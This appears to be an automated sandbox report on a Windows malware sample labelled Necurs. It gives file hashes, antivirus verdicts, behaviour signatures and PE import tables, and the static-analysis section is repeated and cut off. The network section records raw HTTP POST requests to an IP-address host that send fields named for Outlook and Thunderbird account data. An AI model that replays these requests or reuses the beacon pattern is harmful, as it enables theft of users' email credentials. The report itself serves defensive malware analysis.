Exes_69440bc1_exe.json

1.  
2. [*] MalFamily: "Necurs"
3.  
4. [*] MalScore: 10.0
5.  
6. [*] File Name: "Exes_69440bc1.exe"
7. [*] File Size: 401408
8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
9. [*] SHA256: "7edc56dd709d0af1c2f54cda7d8808c1748fa3370aa9319945dca85943d46710"
10. [*] MD5: "cfd3bbce7cc2c03f842c8eaa39e830d3"
11. [*] SHA1: "79b7542eb66a1907802f80db85c879ff6ec423b5"
12. [*] SHA512: "7da934afea190b3bcaf50e2a75f2d8f2d8565ee5dd708fdb9e0b84927157d32beb6ccad5562ae43adc4c38de9ad7f2ac3ff811b24877ce4b6630625777b5376d"
13. [*] CRC32: "69440BC1"
14. [*] SSDEEP: "6144:zBR7zHs5tUeTUSwhJExsyWeTCe1B5TOrdHhjpMCd12I8udh2CF3686/13:tR3szrH5MdB1Vd12YdsCF3686Z"
15.  
16. [*] Process Execution: []
17.  
18. [*] Signatures Detected: [
19. {
20. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
21. "Details": [
22. {
23. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
24. },
25. {
26. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
27. },
28. {
29. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
30. },
31. {
32. "suspicious_request": "http://163.172.84.54/filename.php"
33. }
34. ]
35. },
36. {
37. "Description": "Performs some HTTP requests",
38. "Details": [
39. {
40. "url": "http://163.172.84.54/filename.php"
41. }
42. ]
43. },
44. {
45. "Description": "Writes a potential ransom message to disk",
46. "Details": [
47. {
48. "ransom_file": "Noriben.py"
49. },
50. {
51. "ransom_file": "readme.txt"
52. }
53. ]
54. },
55. {
56. "Description": "File has been identified by 52 Antiviruses on VirusTotal as malicious",
57. "Details": [
58. {
59. "MicroWorld-eScan": "Trojan.GenericKD.31914429"
60. },
61. {
62. "FireEye": "Generic.mg.cfd3bbce7cc2c03f"
63. },
64. {
65. "CAT-QuickHeal": "Trojandropper.Necurs"
66. },
67. {
68. "McAfee": "RDN/Generic.grp"
69. },
70. {
71. "Cylance": "Unsafe"
72. },
73. {
74. "Alibaba": "TrojanDropper:Win32/Necurs.771aab12"
75. },
76. {
77. "K7GW": "Riskware ( 0040eff71 )"
78. },
79. {
80. "K7AntiVirus": "Riskware ( 0040eff71 )"
81. },
82. {
83. "Arcabit": "Trojan.Generic.D1E6F9BD"
84. },
85. {
86. "Invincea": "heuristic"
87. },
88. {
89. "Symantec": "Ransom.Crysis"
90. },
91. {
92. "APEX": "Malicious"
93. },
94. {
95. "Avast": "Win32:Malware-gen"
96. },
97. {
98. "Kaspersky": "Trojan-Dropper.Win32.Necurs.abas"
99. },
100. {
101. "BitDefender": "Trojan.GenericKD.31914429"
102. },
103. {
104. "NANO-Antivirus": "Trojan.Win32.Necurs.fpotwi"
105. },
106. {
107. "Paloalto": "generic.ml"
108. },
109. {
110. "ViRobot": "Trojan.Win32.Agent.401408.AN"
111. },
112. {
113. "Rising": "Dropper.Necurs!8.C43 (CLOUD)"
114. },
115. {
116. "Ad-Aware": "Trojan.GenericKD.31914429"
117. },
118. {
119. "Emsisoft": "Trojan.GenericKD.31914429 (B)"
120. },
121. {
122. "Comodo": "Malware@#uz9bso1tas4q"
123. },
124. {
125. "DrWeb": "Trojan.PWS.Siggen2.12283"
126. },
127. {
128. "TrendMicro": "Trojan.Win32.NECURS.USWE"
129. },
130. {
131. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.fh"
132. },
133. {
134. "Trapmine": "malicious.high.ml.score"
135. },
136. {
137. "Sophos": "Troj/Wonton-AFD"
138. },
139. {
140. "SentinelOne": "DFI - Malicious PE"
141. },
142. {
143. "Cyren": "W32/Trojan.ZDUJ-4279"
144. },
145. {
146. "ESET-NOD32": "a variant of Win32/Kryptik.GSLS"
147. },
148. {
149. "Webroot": "W32.Trojan.GenKD"
150. },
151. {
152. "Antiy-AVL": "Trojan[Dropper]/Win32.Necurs"
153. },
154. {
155. "Microsoft": "Trojan:Win32/Occamy.C"
156. },
157. {
158. "Endgame": "malicious (high confidence)"
159. },
160. {
161. "AegisLab": "Trojan.Win32.Necurs.4!c"
162. },
163. {
164. "ZoneAlarm": "Trojan-Dropper.Win32.Necurs.abas"
165. },
166. {
167. "GData": "Trojan.GenericKD.31914429"
168. },
169. {
170. "TACHYON": "Trojan-Dropper/W32.Necurs.401408"
171. },
172. {
173. "AhnLab-V3": "Trojan/Win32.Agent.C3169420"
174. },
175. {
176. "VBA32": "TrojanDropper.Necurs"
177. },
178. {
179. "ALYac": "Trojan.Agent.Azden"
180. },
181. {
182. "Malwarebytes": "Trojan.Necurs"
183. },
184. {
185. "TrendMicro-HouseCall": "Trojan.Win32.NECURS.USWE"
186. },
187. {
188. "Tencent": "Win32.Trojan-dropper.Necurs.Tdzf"
189. },
190. {
191. "Yandex": "Trojan.DR.Necurs!epG2dZg83x0"
192. },
193. {
194. "Ikarus": "Trojan.Win32.Crypt"
195. },
196. {
197. "Fortinet": "W32/Necurs.ABAS!tr"
198. },
199. {
200. "AVG": "Win32:Malware-gen"
201. },
202. {
203. "Cybereason": "malicious.e7cc2c"
204. },
205. {
206. "Panda": "Trj/GdSda.A"
207. },
208. {
209. "CrowdStrike": "win/malicious_confidence_90% (W)"
210. },
211. {
212. "Qihoo-360": "HEUR/QVM10.2.BA6B.Malware.Gen"
213. }
214. ]
215. }
216. ]
217.  
218. [*] Started Service: []
219.  
220. [*] Executed Commands: []
221.  
222. [*] Mutexes: []
223.  
224. [*] Modified Files: []
225.  
226. [*] Deleted Files: []
227.  
228. [*] Modified Registry Keys: []
229.  
230. [*] Deleted Registry Keys: []
231.  
232. [*] DNS Communications: []
233.  
234. [*] Domains: []
235.  
236. [*] Network Communication - ICMP: []
237.  
238. [*] Network Communication - HTTP: [
239. {
240. "count": 1,
241. "body": "{\"outlook-accounts\":null,\"thunderbird-emails\":null}",
242. "uri": "http://163.172.84.54/filename.php",
243. "user-agent": "",
244. "method": "POST",
245. "host": "163.172.84.54",
246. "version": "1.1",
247. "path": "/filename.php",
248. "data": "POST /filename.php HTTP/1.1\r\nHost: 163.172.84.54\r\nContent-Length: 51\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n{\"outlook-accounts\":null,\"thunderbird-emails\":null}",
249. "port": 80
250. },
251. {
252. "count": 1,
253. "body": "{\"outlook-emails\":null}",
254. "uri": "http://163.172.84.54/filename.php",
255. "user-agent": "",
256. "method": "POST",
257. "host": "163.172.84.54",
258. "version": "1.1",
259. "path": "/filename.php",
260. "data": "POST /filename.php HTTP/1.1\r\nHost: 163.172.84.54\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n{\"outlook-emails\":null}",
261. "port": 80
262. }
263. ]
264.  
265. [*] Network Communication - SMTP: []
266.  
267. [*] Network Communication - Hosts: []
268.  
269. [*] Network Communication - IRC: []
270.  
271. [*] Static Analysis: {
272. "pe": {
273. "peid_signatures": null,
274. "imports": [
275. {
276. "imports": [
277. {
278. "name": "FindClose",
279. "address": "0x40101c"
280. },
281. {
282. "name": "GetVersionExA",
283. "address": "0x401020"
284. },
285. {
286. "name": "HeapFree",
287. "address": "0x401024"
288. },
289. {
290. "name": "FreeLibrary",
291. "address": "0x401028"
292. },
293. {
294. "name": "GetStdHandle",
295. "address": "0x40102c"
296. },
297. {
298. "name": "GetVersionExW",
299. "address": "0x401030"
300. },
301. {
302. "name": "ExitProcess",
303. "address": "0x401034"
304. },
305. {
306. "name": "CompareStringW",
307. "address": "0x401038"
308. },
309. {
310. "name": "CompareStringA",
311. "address": "0x40103c"
312. },
313. {
314. "name": "GetLastError",
315. "address": "0x401040"
316. },
317. {
318. "name": "GetLocaleInfoW",
319. "address": "0x401044"
320. },
321. {
322. "name": "VirtualQuery",
323. "address": "0x401048"
324. },
325. {
326. "name": "GetSystemInfo",
327. "address": "0x40104c"
328. },
329. {
330. "name": "VirtualProtect",
331. "address": "0x401050"
332. },
333. {
334. "name": "UnhandledExceptionFilter",
335. "address": "0x401054"
336. },
337. {
338. "name": "GetCurrentProcess",
339. "address": "0x401058"
340. },
341. {
342. "name": "TerminateProcess",
343. "address": "0x40105c"
344. },
345. {
346. "name": "IsValidCodePage",
347. "address": "0x401060"
348. },
349. {
350. "name": "IsValidLocale",
351. "address": "0x401064"
352. },
353. {
354. "name": "EnumSystemLocalesA",
355. "address": "0x401068"
356. },
357. {
358. "name": "LoadLibraryA",
359. "address": "0x40106c"
360. },
361. {
362. "name": "GetProcAddress",
363. "address": "0x401070"
364. },
365. {
366. "name": "VirtualAlloc",
367. "address": "0x401074"
368. },
369. {
370. "name": "GetModuleHandleA",
371. "address": "0x401078"
372. },
373. {
374. "name": "GetCommandLineA",
375. "address": "0x40107c"
376. },
377. {
378. "name": "GetTimeZoneInformation",
379. "address": "0x401080"
380. },
381. {
382. "name": "InterlockedDecrement",
383. "address": "0x401084"
384. },
385. {
386. "name": "GetStartupInfoW",
387. "address": "0x401088"
388. },
389. {
390. "name": "SetUnhandledExceptionFilter",
391. "address": "0x40108c"
392. },
393. {
394. "name": "WriteFile",
395. "address": "0x401090"
396. },
397. {
398. "name": "GetModuleFileNameA",
399. "address": "0x401094"
400. },
401. {
402. "name": "GetModuleFileNameW",
403. "address": "0x401098"
404. },
405. {
406. "name": "FreeEnvironmentStringsA",
407. "address": "0x40109c"
408. },
409. {
410. "name": "MultiByteToWideChar",
411. "address": "0x4010a0"
412. },
413. {
414. "name": "GetEnvironmentStrings",
415. "address": "0x4010a4"
416. },
417. {
418. "name": "FreeEnvironmentStringsW",
419. "address": "0x4010a8"
420. },
421. {
422. "name": "GetEnvironmentStringsW",
423. "address": "0x4010ac"
424. },
425. {
426. "name": "GetCommandLineW",
427. "address": "0x4010b0"
428. },
429. {
430. "name": "SetHandleCount",
431. "address": "0x4010b4"
432. },
433. {
434. "name": "GetFileType",
435. "address": "0x4010b8"
436. },
437. {
438. "name": "GetStartupInfoA",
439. "address": "0x4010bc"
440. },
441. {
442. "name": "DeleteCriticalSection",
443. "address": "0x4010c0"
444. },
445. {
446. "name": "GetModuleHandleW",
447. "address": "0x4010c4"
448. },
449. {
450. "name": "TlsGetValue",
451. "address": "0x4010c8"
452. },
453. {
454. "name": "TlsAlloc",
455. "address": "0x4010cc"
456. },
457. {
458. "name": "TlsSetValue",
459. "address": "0x4010d0"
460. },
461. {
462. "name": "TlsFree",
463. "address": "0x4010d4"
464. },
465. {
466. "name": "InterlockedIncrement",
467. "address": "0x4010d8"
468. },
469. {
470. "name": "SetLastError",
471. "address": "0x4010dc"
472. },
473. {
474. "name": "GetCurrentThreadId",
475. "address": "0x4010e0"
476. },
477. {
478. "name": "GetCurrentThread",
479. "address": "0x4010e4"
480. },
481. {
482. "name": "HeapDestroy",
483. "address": "0x4010e8"
484. },
485. {
486. "name": "HeapCreate",
487. "address": "0x4010ec"
488. },
489. {
490. "name": "VirtualFree",
491. "address": "0x4010f0"
492. },
493. {
494. "name": "QueryPerformanceCounter",
495. "address": "0x4010f4"
496. },
497. {
498. "name": "GetTickCount",
499. "address": "0x4010f8"
500. },
501. {
502. "name": "GetCurrentProcessId",
503. "address": "0x4010fc"
504. },
505. {
506. "name": "GetSystemTimeAsFileTime",
507. "address": "0x401100"
508. },
509. {
510. "name": "GetCPInfo",
511. "address": "0x401104"
512. },
513. {
514. "name": "GetACP",
515. "address": "0x401108"
516. },
517. {
518. "name": "GetOEMCP",
519. "address": "0x40110c"
520. },
521. {
522. "name": "OutputDebugStringA",
523. "address": "0x401110"
524. },
525. {
526. "name": "LeaveCriticalSection",
527. "address": "0x401114"
528. },
529. {
530. "name": "FatalAppExitA",
531. "address": "0x401118"
532. },
533. {
534. "name": "EnterCriticalSection",
535. "address": "0x40111c"
536. },
537. {
538. "name": "SetConsoleCtrlHandler",
539. "address": "0x401120"
540. },
541. {
542. "name": "InterlockedExchange",
543. "address": "0x401124"
544. },
545. {
546. "name": "LoadLibraryExA",
547. "address": "0x401128"
548. },
549. {
550. "name": "InitializeCriticalSection",
551. "address": "0x40112c"
552. },
553. {
554. "name": "HeapAlloc",
555. "address": "0x401130"
556. },
557. {
558. "name": "Sleep",
559. "address": "0x401134"
560. },
561. {
562. "name": "HeapReAlloc",
563. "address": "0x401138"
564. },
565. {
566. "name": "RtlUnwind",
567. "address": "0x40113c"
568. },
569. {
570. "name": "LCMapStringA",
571. "address": "0x401140"
572. },
573. {
574. "name": "WideCharToMultiByte",
575. "address": "0x401144"
576. },
577. {
578. "name": "LCMapStringW",
579. "address": "0x401148"
580. },
581. {
582. "name": "GetStringTypeA",
583. "address": "0x40114c"
584. },
585. {
586. "name": "GetStringTypeW",
587. "address": "0x401150"
588. },
589. {
590. "name": "GetTimeFormatA",
591. "address": "0x401154"
592. },
593. {
594. "name": "GetDateFormatA",
595. "address": "0x401158"
596. },
597. {
598. "name": "GetUserDefaultLCID",
599. "address": "0x40115c"
600. },
601. {
602. "name": "GetLocaleInfoA",
603. "address": "0x401160"
604. },
605. {
606. "name": "SetEnvironmentVariableA",
607. "address": "0x401164"
608. }
609. ],
610. "dll": "KERNEL32.dll"
611. },
612. {
613. "imports": [
614. {
615. "name": "SetWindowLongW",
616. "address": "0x40116c"
617. },
618. {
619. "name": "CreateWindowExW",
620. "address": "0x401170"
621. },
622. {
623. "name": "SetWindowTextW",
624. "address": "0x401174"
625. },
626. {
627. "name": "CreateWindowExA",
628. "address": "0x401178"
629. },
630. {
631. "name": "PostMessageW",
632. "address": "0x40117c"
633. },
634. {
635. "name": "UnregisterClassA",
636. "address": "0x401180"
637. },
638. {
639. "name": "DestroyWindow",
640. "address": "0x401184"
641. },
642. {
643. "name": "LoadStringW",
644. "address": "0x401188"
645. },
646. {
647. "name": "GetMenuStringW",
648. "address": "0x40118c"
649. },
650. {
651. "name": "DefWindowProcW",
652. "address": "0x401190"
653. },
654. {
655. "name": "SendMessageW",
656. "address": "0x401194"
657. },
658. {
659. "name": "RegisterClassW",
660. "address": "0x401198"
661. }
662. ],
663. "dll": "USER32.dll"
664. },
665. {
666. "imports": [
667. {
668. "name": "RegOpenKeyExA",
669. "address": "0x401000"
670. },
671. {
672. "name": "RegEnumValueA",
673. "address": "0x401004"
674. },
675. {
676. "name": "RegSetValueExA",
677. "address": "0x401008"
678. },
679. {
680. "name": "RegOpenKeyExW",
681. "address": "0x40100c"
682. }
683. ],
684. "dll": "ADVAPI32.dll"
685. },
686. {
687. "imports": [
688. {
689. "name": "ImageList_Add",
690. "address": "0x401014"
691. }
692. ],
693. "dll": "COMCTL32.dll"
694. }
695. ],
696. "digital_signers": null,
697. "exported_dll_name": null,
698. "actual_checksum": "0x0006d473",
699. "overlay": null,
700. "imagebase": "0x00400000",
701. "reported_checksum": "0x00000000",
702. "icon_hash": null,
703. "entrypoint": "0x00446f6d",
704. "timestamp": "2017-06-26 19:27:00",
705. "osversion": "4.0",
706. "sections": [
707. {
708. "name": ".text",
709. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
710. "virtual_address": "0x00001000",
711. "size_of_data": "0x0005b000",
712. "entropy": "6.41",
713. "raw_address": "0x00001000",
714. "virtual_size": "0x0005a538",
715. "characteristics_raw": "0x70000020"
716. },
717. {
718. "name": ".data",
719. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
720. "virtual_address": "0x0005c000",
721. "size_of_data": "0x00003000",
722. "entropy": "4.54",
723. "raw_address": "0x0005c000",
724. "virtual_size": "0x00002d80",
725. "characteristics_raw": "0xd0000040"
726. },
727. {
728. "name": ".sxdata",
729. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_LNK_INFO|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
730. "virtual_address": "0x0005f000",
731. "size_of_data": "0x00001000",
732. "entropy": "0.07",
733. "raw_address": "0x0005f000",
734. "virtual_size": "0x0000006c",
735. "characteristics_raw": "0xc0000240"
736. },
737. {
738. "name": ".reloc",
739. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
740. "virtual_address": "0x00060000",
741. "size_of_data": "0x00002000",
742. "entropy": "3.98",
743. "raw_address": "0x00060000",
744. "virtual_size": "0x000011aa",
745. "characteristics_raw": "0x42000040"
746. }
747. ],
748. "resources": [],
749. "dirents": [
750. {
751. "virtual_address": "0x00000000",
752. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
753. "size": "0x00000000"
754. },
755. {
756. "virtual_address": "0x0005abdc",
757. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
758. "size": "0x00000064"
759. },
760. {
761. "virtual_address": "0x00000000",
762. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
763. "size": "0x00000000"
764. },
765. {
766. "virtual_address": "0x00000000",
767. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
768. "size": "0x00000000"
769. },
770. {
771. "virtual_address": "0x00000000",
772. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
773. "size": "0x00000000"
774. },
775. {
776. "virtual_address": "0x00060000",
777. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
778. "size": "0x00000eec"
779. },
780. {
781. "virtual_address": "0x00000000",
782. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
783. "size": "0x00000000"
784. },
785. {
786. "virtual_address": "0x00000000",
787. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
788. "size": "0x00000000"
789. },
790. {
791. "virtual_address": "0x00000000",
792. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
793. "size": "0x00000000"
794. },
795. {
796. "virtual_address": "0x00000000",
797. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
798. "size": "0x00000000"
799. },
800. {
801. "virtual_address": "0x00000000",
802. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
803. "size": "0x00000000"
804. },
805. {
806. "virtual_address": "0x00000000",
807. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
808. "size": "0x00000000"
809. },
810. {
811. "virtual_address": "0x00001000",
812. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
813. "size": "0x000001a0"
814. },
815. {
816. "virtual_address": "0x00000000",
817. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
818. "size": "0x00000000"
819. },
820. {
821. "virtual_address": "0x00000000",
822. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
823. "size": "0x00000000"
824. },
825. {
826. "virtual_address": "0x00000000",
827. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
828. "size": "0x00000000"
829. }
830. ],
831. "exports": [],
832. "guest_signers": {},
833. "imphash": "7073758031d4012622cea53183697aac",
834. "icon_fuzzy": null,
835. "icon": null,
836. "pdbpath": null,
837. "imported_dll_count": 4,
838. "versioninfo": []
839. }
840. }
841.  
842. [*] Resolved APIs: []
843.  
844. [*] Static Analysis: {
845. "pe": {
846. "peid_signatures": null,
847. "imports": [
848. {
849. "imports": [
850. {
851. "name": "FindClose",
852. "address": "0x40101c"
853. },
854. {
855. "name": "GetVersionExA",
856. "address": "0x401020"
857. },
858. {
859. "name": "HeapFree",
860. "address": "0x401024"
861. },
862. {
863. "name": "FreeLibrary",
864. "address": "0x401028"
865. },
866. {
867. "name": "GetStdHandle",
868. "address": "0x40102c"
869. },
870. {
871. "name": "GetVersionExW",
872. "address": "0x401030"
873. },
874. {
875. "name": "ExitProcess",
876. "address": "0x401034"
877. },
878. {
879. "name": "CompareStringW",
880. "address": "0x401038"
881. },
882. {
883. "name": "CompareStringA",
884. "address": "0x40103c"
885. },
886. {
887. "name": "GetLastError",
888. "address": "0x401040"
889. },
890. {
891. "name": "GetLocaleInfoW",
892. "address": "0x401044"
893. },
894. {
895. "name": "VirtualQuery",
896. "address": "0x401048"
897. },
898. {
899. "name": "GetSystemInfo",
900. "address": "0x40104c"
901. },
902. {
903. "name": "VirtualProtect",
904. "address": "0x401050"
905. },
906. {
907. "name": "UnhandledExceptionFilter",
908. "address": "0x401054"
909. },
910. {
911. "name": "GetCurrentProcess",
912. "address": "0x401058"
913. },
914. {
915. "name": "TerminateProcess",
916. "address": "0x40105c"
917. },
918. {
919. "name": "IsValidCodePage",
920. "address": "0x401060"
921. },
922. {
923. "name": "IsValidLocale",
924. "address": "0x401064"
925. },
926. {
927. "name": "EnumSystemLocalesA",
928. "address": "0x401068"
929. },
930. {
931. "name": "LoadLibraryA",
932. "address": "0x40106c"
933. },
934. {
935. "name": "GetProcAddress",
936. "address": "0x401070"
937. },
938. {
939. "name": "VirtualAlloc",
940. "address": "0x401074"
941. },
942. {
943. "name": "GetModuleHandleA",
944. "address": "0x401078"
945. },
946. {
947. "name": "GetCommandLineA",
948. "address": "0x40107c"
949. },
950. {
951. "name": "GetTimeZoneInformation",
952. "address": "0x401080"
953. },
954. {
955. "name": "InterlockedDecrement",
956. "address": "0x401084"
957. },
958. {
959. "name": "GetStartupInfoW",
960. "address": "0x401088"
961. },
962. {
963. "name": "SetUnhandledExceptionFilter",
964. "address": "0x40108c"
965. },
966. {
967. "name": "WriteFile",
968. "address": "0x401090"
969. },
970. {
971. "name": "GetModuleFileNameA",
972. "address": "0x401094"
973. },
974. {
975. "name": "GetModuleFileNameW",
976. "address": "0x401098"
977. },
978. {
979. "name": "FreeEnvironmentStringsA",
980. "address": "0x40109c"
981. },
982. {
983. "name": "MultiByteToWideChar",
984. "address": "0x4010a0"
985. },
986. {
987. "name": "GetEnvironmentStrings",
988. "address": "0x4010a4"
989. },
990. {
991. "name": "FreeEnvironmentStringsW",
992. "address": "0x4010a8"
993. },
994. {
995. "name": "GetEnvironmentStringsW",
996. "address": "0x4010ac"
997. },
998. {
999. "name": "GetCommandLineW",
1000. "address": "0x4010b0"
1001. },
1002. {
1003. "name": "SetHandleCount",
1004. "address": "0x4010b4"
1005. },
1006. {
1007. "name": "GetFileType",
1008. "address": "0x4010b8"
1009. },
1010. {
1011. "name": "GetStartupInfoA",
1012. "address": "0x4010bc"
1013. },
1014. {
1015. "name": "DeleteCriticalSection",
1016. "address": "0x4010c0"
1017. },
1018. {
1019. "name": "GetModuleHandleW",
1020. "address": "0x4010c4"
1021. },
1022. {
1023. "name": "TlsGetValue",
1024. "address": "0x4010c8"
1025. },
1026. {
1027. "name": "TlsAlloc",
1028. "address": "0x4010cc"
1029. },
1030. {
1031. "name": "TlsSetValue",
1032. "address": "0x4010d0"
1033. },
1034. {
1035. "name": "TlsFree",
1036. "address": "0x4010d4"
1037. },
1038. {
1039. "name": "InterlockedIncrement",
1040. "address": "0x4010d8"
1041. },
1042. {
1043. "name": "SetLastError",
1044. "address": "0x4010dc"
1045. },
1046. {
1047. "name": "GetCurrentThreadId",
1048. "address": "0x4010e0"
1049. },
1050. {
1051. "name": "GetCurrentThread",
1052. "address": "0x4010e4"
1053. },
1054. {
1055. "name": "HeapDestroy",
1056. "address": "0x4010e8"
1057. },
1058. {
1059. "name": "HeapCreate",
1060. "address": "0x4010ec"
1061. },
1062. {
1063. "name": "VirtualFree",
1064. "address": "0x4010f0"
1065. },
1066. {
1067. "name": "QueryPerformanceCounter",
1068. "address": "0x4010f4"
1069. },
1070. {
1071. "name": "GetTickCount",
1072. "address": "0x4010f8"
1073. },
1074. {
1075. "name": "GetCurrentProcessId",
1076. "address": "0x4010fc"
1077. },
1078. {
1079. "name": "GetSystemTimeAsFileTime",
1080. "address": "0x401100"
1081. },
1082. {
1083. "name": "GetCPInfo",
1084. "address": "0x401104"
1085. },
1086. {
1087. "name": "GetACP",
1088. "address": "0x401108"
1089. },
1090. {
1091. "name": "GetOEMCP",
1092. "address": "0x40110c"
1093. },
1094. {
1095. "name": "OutputDebugStringA",
1096. "address": "0x401110"
1097. },
1098. {
1099. "name": "LeaveCriticalSection",
1100. "address": "0x401114"
1101. },
1102. {
1103. "name": "FatalAppExitA",
1104. "address": "0x401118"
1105. },
1106. {
1107. "name": "EnterCriticalSection",
1108. "address": "0x40111c"
1109. },
1110. {
1111. "name": "SetConsoleCtrlHandler",
1112. "address": "0x401120"
1113. },
1114. {
1115. "name": "InterlockedExchange",
1116. "address": "0x401124"
1117. },
1118. {
1119. "name": "LoadLibraryExA",
1120. "address": "0x401128"
1121. },
1122. {
1123. "name": "InitializeCriticalSection",
1124. "address": "0x40112c"
1125. },
1126. {
1127. "name": "HeapAlloc",
1128. "address": "0x401130"
1129. },
1130. {
1131. "name": "Sleep",
1132. "address": "0x401134"
1133. },
1134. {
1135. "name": "HeapReAlloc",
1136. "address": "0x401138"
1137. },
1138. {
1139. "name": "RtlUnwind",
1140. "address": "0x40113c"
1141. },
1142. {
1143. "name": "LCMapStringA",
1144. "address": "0x401140"
1145. },
1146. {
1147. "name": "WideCharToMultiByte",
1148. "address": "0x401144"
1149. },
1150. {
1151. "name": "LCMapStringW",
1152. "address": "0x401148"
1153. },
1154. {
1155. "name": "GetStringTypeA",
1156. "address": "0x40114c"
1157. },
1158. {
1159. "name": "GetStringTypeW",
1160. "address": "0x401150"
1161. },
1162. {
1163. "name": "GetTimeFormatA",
1164. "address": "0x401154"
1165. },
1166. {
1167. "name": "GetDateFormatA",
1168. "address": "0x401158"
1169. },
1170. {
1171. "name": "GetUserDefaultLCID",
1172. "address": "0x40115c"
1173. },
1174. {
1175. "name": "GetLocaleInfoA",
1176. "address": "0x401160"
1177. },
1178. {
1179. "name": "SetEnvironmentVariableA",
1180. "address": "0x401164"
1181. }
1182. ],
1183. "dll": "KERNEL32.dll"
1184. },
1185. {
1186. "imports": [
1187. {
1188. "name": "SetWindowLongW",
1189. "address": "0x40116c"
1190. },
1191. {
1192. "name": "CreateWindowExW",
1193. "address": "0x401170"
1194. },
1195. {
1196. "name": "SetWindowTextW",
1197. "address": "0x401174"
1198. },
1199. {
1200. "name": "CreateWindowExA",
1201. "address": "0x401178"
1202. },
1203. {
1204. "name": "PostMessageW",
1205. "address": "0x40117c"
1206. },
1207. {
1208. "name": "UnregisterClassA",
1209. "address": "0x401180"
1210. },
1211. {
1212. "name": "DestroyWindow",
1213. "address": "0x401184"
1214. },
1215. {
1216. "name": "LoadStringW",
1217. "address": "0x401188"
1218. },
1219. {
1220. "name": "GetMenuStringW",
1221. "address": "0x40118c"
1222. },
1223. {
1224. "name": "DefWindowProcW",
1225. "address": "0x401190"
1226. },
1227. {
1228. "name": "SendMessageW",
1229. "address": "0x401194"
1230. },
1231. {
1232. "name": "RegisterClassW",
1233. "address": "0x401198"
1234. }
1235. ],
1236. "dll": "USER32.dll"
1237. },
1238. {
1239. "imports": [
1240. {
1241. "name": "RegOpenKeyExA",
1242. "address": "0x401000"
1243. },
1244. {
1245. "name": "RegEnumValueA",
1246. "address": "0x401004"
1247. },
1248. {
1249. "name": "RegSetValueExA",
1250. "address": "0x401008"
1251. },
1252. {
1253. "name": "RegOpenKeyExW",
1254. "address": "0x40100c"
1255. }
1256. ],
1257. "dll": "ADVAPI32.dll"
1258. },
1259. {
1260. "imports": [
1261. {
1262. "name": "ImageList_Add",
1263. "address": "0x401014"
1264. }
1265. ],
1266. "dll": "COMCTL32.dll"
1267. }
1268. ],
1269. "digital_signers": null,
1270. "exported_dll_name": null,
1271. "actual_checksum": "0x0006d473",
1272. "overlay": null,
1273. "imagebase": "0x00400000",
1274. "reported_checksum": "0x00000000",
1275. "icon_hash": null,
1276. "entrypoint": "0x00446f6d",
1277. "timestamp": "2017-06-26 19:27:00",
1278. "osversion": "4.0",
1279. "sections": [
1280. {
1281. "name": ".text",
1282. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
1283. "virtual_address": "0x00001000",
1284. "size_of_data": "0x0005b000",
1285. "entropy": "6.41",
1286. "raw_address": "0x00001000",
1287. "virtual_size": "0x0005a538",
1288. "characteristics_raw": "0x70000020"
1289. },
1290. {
1291. "name": ".data",
1292. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
1293. "virtual_address": "0x0005c000",
1294. "size_of_data": "0x00003000",
1295. "entropy": "4.54",
1296. "raw_address": "0x0005c000",
1297. "virtual_size": "0x00002d80",
1298. "characteristics_raw": "0xd0000040"
1299. },
1300. {
1301. "name": ".sxdata",
1302. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_LNK_INFO|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
1303. "virtual_address": "0x0005f000",
1304. "size_of_data": "0x00001000",
1305. "entropy": "0.07",
1306. "raw_address": "0x0005f000",
1307. "virtual_size": "0x0000006c",
1308. "characteristics_raw": "0xc0000240"
1309. },
1310. {
1311. "name": ".reloc",
1312. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
1313. "virtual_address": "0x00060000",
1314. "size_of_data": "0x00002000",
1315. "entropy": "3.98",
1316. "raw_address": "0x00060000",
1317. "virtual_size": "0x000011aa",
1318. "characteristics_raw": "0x42000040"
1319. }
1320. ],
1321. "resources": [],
1322. "dirents": [
1323. {
1324. "virtual_address": "0x00000000",
